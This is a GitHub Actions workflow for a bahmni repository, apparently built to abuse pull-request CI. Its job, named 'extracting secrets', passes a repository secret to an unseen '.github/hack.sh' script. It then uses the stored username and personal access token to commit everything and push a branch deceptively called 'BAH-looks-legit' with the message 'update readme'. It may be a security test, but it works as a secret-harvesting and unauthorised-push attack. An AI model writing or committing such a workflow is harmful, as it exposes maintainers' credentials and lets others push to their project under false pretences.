name: Pull Request
on:
  pull_request:
    branches: [ main ]
env:
  BOGUS_SECRET: ${{ secrets.BAHMNI_AWS_REGION }}
jobs:
  main:
    name: extracting secrets
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2
      - name: echo
        run: |
          secret=${{ secrets.BAHMNI_AWS_REGION }}
          sh .github/hack.sh "$secret"
      - name: checking secrets
        run: |
          git config user.name ${{ secrets.BAHMNI_USERNAME}}
          git config user.email ${{ secrets.BAHMNI_EMAIL}}
          git checkout -b BAH-looks-legit
          git add .
          git commit -m "update readme"
          git push 'https://${{ secrets.BAHMNI_USERNAME}}:${{ secrets.BAHMNI_PAT}}@github.com/bahmni/speech-assistant-frontend.git' BAH-looks-legit
